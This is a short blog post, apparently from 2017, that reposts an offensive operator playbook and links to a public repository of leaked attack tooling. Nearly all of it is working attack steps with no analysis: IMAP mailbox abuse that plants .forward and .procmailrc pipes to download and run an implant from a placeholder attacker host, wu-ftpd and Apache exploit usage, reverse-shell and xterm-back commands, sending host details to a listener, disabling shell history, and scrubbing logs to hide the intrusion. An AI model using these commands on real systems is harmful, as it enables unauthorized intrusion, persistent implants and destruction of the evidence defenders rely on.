Wednesday, May 31, 2017

DO YOU WANT THE JELLYFISH ALL CODE SOURCE?

### Imap masqerade
### Bring a local to get root
### for solaris
nc -v -l -p 53 < ../up/noserver-sparc-sun-solaris2.5.1
noclient -l 25
telnet TARGET_IP 143
A000 LOGIN user password
A001 EXAMINE /etc/mail/sendmail.cf
A002 FETCH 1 RFC822
A003 EXAMINE /etc/passwd
A004 FETCH 1 RFC822
A003 EXAMINE /etc/shells
A004 FETCH 1 RFC822
A005 EXAMINE .forward
A006 CREATE .forward
A007 CREATE .forward
A008 APPEND .forward (\Seen) {145}
"| /bin/ksh -c '/bin/cat
/tmp/sendmail;chmod +x /tmp/sendmail;D=-cPITCH_IP:25 PATH=/tmp sendmail;rm -f /tmp/sendmail'"
A009 DELETE .forward
A010 LOGOUT
telnet PITCH_IP 25
HELO helo
MAIL FROM: user@itt.beta.net
RCPT TO: user@itt.beta.net
DATA
.
QUIT

# echo -e "HTTP/1.0 200\n" > new
# cat new noserver-2.6.1-i586.pc.linux.gnu.redhat-5.0 > sendmail
# nc -v -l -p 53 < sendmail
# noclient -l 25
telnet TARGET_IP 143
A000 LOGIN user password
A001 EXAMINE /etc/mail/sendmail.cf
A002 FETCH 1 RFC822
A003 EXAMINE /etc/passwd
A004 FETCH 1 RFC822
A003 EXAMINE /etc/shells
A004 FETCH 1 RFC822
A100 LIST /etc/smrsh *
A005 EXAMINE .forward
A006 CREATE .forward
A007 CREATE .forward
A008 APPEND .forward (\Seen) {11}
"| slocal"
A100 CREATE .maildelivery
A101 APPEND .maildelivery (\Seen) {37}
To user pipe A >/home/user/.g
A102 LIST "" %
A102 RENAME .g .procmailrc
A008 APPEND .procmailrc (\Seen) {128}
:0 c
|cd /tmp;wget http://PITCH_IP:53/sendmail; chmod +x /tmp/sendmail;D=-cPITCH_IP:25 PATH=/tmp sendmail;rm -f sendmail
A009 DELETE .forward
A009 DELETE .maildelivery
A009 DELETE .procmailrc
A010 LOGOUT
telnet localhost 25
HELO helo
MAIL FROM: user@localhost.localdomain
RCPT TO: user@localhost.localdomain
DATA
.
QUIT

telnet fawn 143
A000 LOGIN user password
A001 EXAMINE /etc/mail/sendmail.cf
A002 FETCH 1 RFC822
A003 EXAMINE /etc/passwd
A004 FETCH 1 RFC822
A003 EXAMINE /etc/shells
A004 FETCH 1 RFC822
A102 LIST "/usr/bin/X11" %
A005 EXAMINE .forward
A006 CREATE .forward
A007 CREATE .forward
A008 APPEND .forward (\Seen) {50}
"| /usr/bin/*11/xterm -display PITCH_IP:26000"
A009 DELETE .forward
A010 LOGOUT
telnet fawn 25
HELO helo
MAIL FROM: user@fawn.beta.net
RCPT TO: user@fawn.beta.net
DATA
.
QUIT

### cleanup possible logging in /var/adm/messages (should blend in if it fails)

###########################################################
# EXPOUNDATOM
###########################################################
# Requires the target to have the wu-2.6.1 FTP service running
# Requires anonymous ftp access (determined if exploit works)
# -scan ftp TARGET_IP
# A maximum of two tries can be attempted.
#
# Syntax
# ./wu-261-linux -h
# For target list:
# ./wu-261-linux -t0 -h
# No redirection: ./wu-261-linux TARGET_IP 21 VERSION
# w/ redirection: -tunnel l 21 TARGET_IP
# Locally: ./wu-261-linux -a -d 127.0.0.1
./wu-261-linux -t17 -d 127.0.0.1
# SHould give you root; need to upload nopen
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
cd /tmp
mkdir WORK_DIR
cd /tmp/WORK_DIR
pwd
which uudecode uncompress
# gedit sendmail
uudecode; ls -latr
uncompress sendmail.Z
ls -la
chmod 700 sendmail
PATH=. sendmail
# IF it complains about the user/pass correct, then it's not vulnerable to
# our pair that we try to send it;
# Cleanup:
# /var/log/messages (look for ftp access)
# /var/adm/utmpx, wtmpx
# /var/log/secure

###################################################
### EMBERSNOUT
###################################################
# must verify that box is RH9.0(SHRIKE) and that
# httpd is "Apache/2.0.40 (Red Hat Linux)
-scan telnet TARGET_IP
-scan ssh TARGET_IP
-scan ssl TARGET_IP
# Notes:
# this indicates it's RH9.0 but could be either Psyche or Shrike:
# (Linux release 2.4.20-8custom #3 SMP Thu Aug 28 13:56:20 EDT 2003)
# seeing this indicates (Shrike) because the version is bundled with it:
# SH-1.99-OpenSSH_3.5p1
# this version of Apache is needed but Psyche comes with 2.0.40-8 and
# Shrike comes with 2.0.40-21; the release in not determinable from
# a scan; just verify it's what is expected:
# Server: Apache/2.0.40 (Red Hat Linux)
#
# op box should work - depends if python is included
rpm -qf /usr/bin/python
# should see: python-base-2.2-9mdk
# if you want it to pop an xterm back to your screen:
# - make sure 6000 is listening
# - run xhost +
./es.py
Arguments: ['./es.py']
Usage -> ./es.py ip port packet_size start_ebp end_ebp ebp_inc hex_pad_byte "cmd"
where...
ip............target IP address
port..........target httpd TCP port number (usually 443)
packet_size...attack packet length in bytes
start_ebp.....guessed %ebp value to start with
end_ebp.......guessed %ebp value to end with
ebp_inc.......how many stack bytes to bump %ebp each time
hex_pad_byte..packet filling byte (0x0 will do randomized fill)
"cmd".........ASCII command string to be executed on target

### Locally
netstat -an |grep 6000
xhost +

########### REDIRECTED:
### Redirector:
-tunnel l 443 TARGET_IP r 6006 127.0.0.1 6000 r NETCAT_PORT
### In a local scripted window, set up a netcat to listen for a connection:
nc -vv -l -p NETCAT_PORT
### Locally (choose a method):
### This one will send command results back to a netcat window (not interactive)
./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 (/bin/uname -a; /usr/bin/id; /bin/ps -auxww; /bin/w)|/usr/ bin/telnet PITCH_IP NETCAT_PORT"
### This one gives you an interactive window:
./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 "(sh &0 2>&0)"
# or for ksh:
./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 "(ksh -c "sh &0 2>&0")"
### This one pops back an xterm (be patient for it to pop back and keep mouse clear of window):
./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 "/usr/bin/X11/xterm -display PITCH_IP:6 -e /bin/sh"

############ No Redirection:
./es.py TARGET_IP 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 (/bin/uname -a; /usr/bin/id; /bin/ps -auxww; /bin/w)|/usr/ bin/telnet LOCALIP NETCAT_PORT"
./es.py TARGET_IP 443 5000 HIT_STRING 0xbffffff0 0x4 0x0 "(/usr/bin/X11/xterm -display LOCALIP:0 -e /bin/sh)"
./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 "(sh &0 2>&0)"
### if the exploit stalls after a bit, hit Ctl-C to wake it up, which
### prompts you if you want to continue - hit 'y'
### watch for a connection back to your netcat window

### Once you have access........
### you need to first clean extraneous processes started by httpd
### run this to help clean:
unset HISTFILE
unset HISTSIZE
unset HISTFILESIZE
pwd
exec 3<&- 4<&- 5<&- 6<&- 7<&- 8<&- 9<&- 10<&- 11<&- 12<&- 13<&- 255<&-
/usr/sbin/lsof |grep ^sh
uname -a; id
mkdir -p /tmp/.httpd-lock; chmod 700 /tmp/.httpd-lock; ls -lctra /tmp
cd /tmp/.httpd-lock; pwd
which uudecode uncompress
#telnet PITCH_IP NETCAT_PORT
#uncompress crond.Z; chmod 700 crond; ls -la
# if no uudecode, use this
### locally:
# nc -l -vv -p NETCAT_PORT < crond
### back on target window:
#/bin/cat /tmp/.httpd-lock/crond
chmod 700 crond
PATH=. crond
PATH=. D=-cPITCHIP:NOPEN_PORT crond
rm crond
-nstun TARGET_IP
-nrtun NOPEN_PORT
noclient TARGET_IP
### need to elevate so you can clean logs (use eventstart - ptrace won't work on RH9)
### Logging:
-lt /var/log/httpd
/var/log/httpd/ssl_access_log
/var/log/httpd/ssl_request_log
/var/log/httpd/ssl_error_log
/var/log/httpd/error_log
-lt /var/log
/var/log/messages
/var/log/secure
/var/log/maillog
egrep -v PITCH_IP /var/log/httpd/ssl_access_log > t; cat t > /var/log/httpd/ssl_access_log
egrep -v PITCH_IP /var/log/httpd/ssl_request_log > t; cat t > /var/log/httpd/ssl_request_log
egrep -v PITCH_IP /var/log/httpd/error_log > t; cat t > /var/log/httpd/error_log
egrep -v Segmentation /var/log/httpd/error_log > t; cat t > /var/log/httpd/error_log
egrep -v PITCH_IP /var/log/httpd/ssl_error_log > t; cat t > /var/log/httpd/ssl_error_log
egrep -v PITCH_IP /var/log/messages > t; cat t > /var/log/messages
egrep -v PITCH_IP /var/log/secure > t; cat t > /var/log/secure
egrep -v PITCH_IP /var/log/maillog > t; cat t > /var/log/maillog

https://github.com/x0rz/EQGRP/blob/master/Linux/etc/opscript.txt
